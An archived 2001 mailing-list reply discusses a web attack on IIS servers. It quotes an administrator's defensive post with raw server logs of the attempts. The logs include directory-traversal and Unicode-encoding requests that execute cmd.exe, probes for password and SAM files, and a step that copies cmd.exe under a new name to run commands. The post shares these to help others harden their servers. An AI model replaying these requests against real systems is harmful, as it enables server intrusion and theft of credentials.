TallyList : mailing list management, archiving, and analysis

Archive of:
CF-Talk
Cold Fusion - Technical

home
24 hour view
quick stats
weekly updates

all tallylists
corporate solutions
archive your favorite
help / feedback

About Cold Fusion :
product's home
product's list home

Archived TallyList / CF-Talk:
Subject: Re: Log files of a web attack.

Jon Hall (334p/+0r) Posted: Wednesday 09 May 2001
This post: 70 views, +0 rating

A little more info is starting to go around. This attack is a scripted attack from a worm that infects Solaris machines, which then attack up to 2000 IIS servers before putting up the f*ck usa pages on the Solaris machine. Mostly harmless, but you gotta admire the mind that came up with that. Script kiddies who are to lazy to run their own scripts! ;-)

I am getting more and more annoyed at Microsoft's poor excuse for a web server every day though.

jon ----- Original Message ----- From: <moonerent@yahoo.com> To: "CF-Talk" <cf-talk@houseoffusion.com> Sent: Tuesday, May 08, 2001 9:52 PM Subject: OT: Log files of a web attack.

> Hi, > > I thought the group would like to see the techniques of a recent attack on > our web servers. They've been doing this a couple times a day for a week. > UUNet (their ISP) is slow in doing stopping them. > > To secure IIS we've removed all extensions except cfm. We've taken out all > the iis folders and files like /mdac, /scripts and /printers. We've secured > cfide folder with passwords including locking out the user after a couple > failed attempts and log the failures. Lastly, we've remove all permissions > from cmd.exe. > > This has kept them out to date. Any additional ideas are welcomed. Non of > this is top secret info, the hackers already know it, but do you and are you > protected? > > HTH, > > Rick Moon > > > 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET > /scripts/../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET > /scripts/..Ã%pc../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET > /scripts/..Ã€%9v../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET > /scripts/..Ã€%qf../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET > /scripts/..Ã%8s../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET > /scripts/..Ã.../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET > /scripts/..o../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET > /scripts/..Ã°??Â¯../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET > /scripts/..Ã¸???Â¯../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET > /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 01:26:07 200.245.48.155 - myIP GET > /scripts..\../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET > /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET > /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET > /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET > /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET > /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET > /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET > /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 - > 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 - > 2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe - > 404 - > 2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 - > 2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 - > 2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - > 404 - > 2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd - > 404 - > 2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd - > 404 - > 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat - > 404 - > 2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 - > 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - > 404 - > 2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr - > 404 - > 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr - > 404 - > 2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr - > 404 - > 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr - > 404 - > 2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr - > 404 - > 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr - > 404 - > 2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr - > 404 - > 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr - > 404 - > 2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe - > 404 - > 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl - > 404 - > 2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe - > 404 - > 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe - > 404 - > 2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe - > 404 - > 2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA - > 404 - > 2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD > /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 - > 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD > /adsamples/config/site.csc - 404 - > 2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll > http/dir 404 - > 2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD > /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 - > 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD > /cfdocs/expelval/openfile.cfm - 401 - > 2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD > /cfdocs/expelval/ExprCalc.cfm - 401 - > 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD > /cfdocs/expelval/displayopenedfile.cfm - 401 - > 2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD > /cfdocs/expelval/sendmail.cfm - 401 - > 2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 - > 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 - > 2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl - > 404 - > 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 - > 2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.aspÂ - 404 - > 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ - > 404 - > 2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe - > 404 - > 2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 > Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90) > 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe - > 404 - > 2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 - > 2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe - > 404 - > 2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 - > 2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 - > 2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 - > 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe - > 404 - > 2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc - > 404 - > 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 - > 2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 - > 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll - > 404 - > 2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe - > 404 - > 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD > /officescan/cgi/jdkRqNotify.exe - 404 - > 2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir > 404 - > 2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe - > 404 - > 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw > CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 - > 2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD > /_vti_bin/_vti_aut/dvwssr.dll - 404 - > 2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 - > 2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200 > Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) > 2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200 > Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt) > 2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 - > 2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET > /scripts/..Ã€%qf../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET > /scripts/..Ã%8s../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET > /scripts/..\../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET > /scripts/..o../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET > /scripts/..Ã°??Â¯../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET > /scripts/..Ã¸???Â¯../winnt/system32/cmd.exe /c+dir 404 - > 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe - > 404 - > 2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe - > 404 - > 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD > /_vti_pvt/administrators.pwd - 404 - > 2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 - > 2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 - > 2001-05-05 02:43:17 200.245.48.132 - myIP HEAD > /samples/search/queryhit.htm - 404 - > 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD > /iissamples/exair/howitworks/codebrws.asp - 404 - > 2001-05-05 02:43:33 200.245.48.132 - myIP HEAD > /iissamples/sdk/asp/docs/codebrws.asp - 404 - > 2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 - > 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 - > 2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 - > 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 - > 2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 - > 2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 - > 2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 - > 2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 - > This is the really bad one. > 2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET > /scripts/../../winnt/system32/cmd.exe > /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe > 2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET > /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot > > end. >

Similar Subject Line Posts (+/- two weeks of this post)

RE: Log files of a web attack.	09 May 2001	(76 v/ +0 r)
RE: Log files of a web attack.	09 May 2001	(55 v/ +0 r)
RE: Log files of a web attack.	09 May 2001	(47 v/ +0 r)
Re: Log files of a web attack.	09 May 2001	(42 v/ +0 r)
Re: Log files of a web attack.	09 May 2001 (this post)	(70 v/ +0 r)
RE: Log files of a web attack.	08 May 2001	(49 v/ +0 r)
OT: Log files of a web attack.	08 May 2001	(45 v/ +0 r)

Send a reply to the CF-Talk list!
	NOTE: Many lists will reject your post unless you have already registered with them. Also - don't forget the right account to send from (for those with multiple emails!)